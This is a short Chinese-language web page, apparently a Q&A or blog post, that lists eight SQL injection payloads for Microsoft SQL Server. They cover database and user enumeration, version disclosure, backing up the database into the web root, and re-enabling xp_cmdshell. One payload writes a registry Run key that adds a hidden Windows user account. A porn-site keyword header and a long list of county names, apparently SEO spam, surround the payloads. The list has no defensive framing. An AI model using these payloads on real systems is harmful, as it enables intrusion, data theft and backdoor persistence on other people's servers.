中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

sql注入語句有哪些

小新
259
2020-12-16 10:17:44
欄目: 云計算

sql注入語句有哪些

sql注入語句有:

1、返回的是連接的數據庫名:

and db_name()>0

2、獲取連接用戶名:

and user>0

3、將數據庫備份到Web目錄下面:

;backup database 數據庫名 to disk='c:\inetpub\wwwroot\1.db';--

4、顯示SQL系統版本:

and 1=(select @@VERSION) 或and 1=convert(int,@@version)--

5、判斷xp_cmdshell擴展存儲過程是否存在:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

6、恢復xp_cmdshell擴展存儲的命令:

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--

7、向啟動組中寫入命令行和執行程序:

;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\

Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'

8、查看當前的數據庫名稱:

and 0 <> db_name(n) n改成0,1,2,3……就可以跨庫了 或and 1=convert(int,db_name())--

0
彝良县| 虎林市| 金湖县| 呼和浩特市| 鲁山县| 五莲县| 龙井市| 韶关市| 无棣县| 太保市| 五指山市| 罗定市| 房产| 婺源县| 梓潼县| 文安县| 集贤县| 翁牛特旗| 通城县| 泸州市| 贡觉县| 玉树县| 皋兰县| 山丹县| 邵东县| 德化县| 鸡泽县| 沈丘县| 宣武区| 马山县| 张家界市| 阿瓦提县| 昌江| 赤峰市| 都匀市| 马鞍山市| 清河县| 沙河市| 千阳县| 安溪县| 吉首市|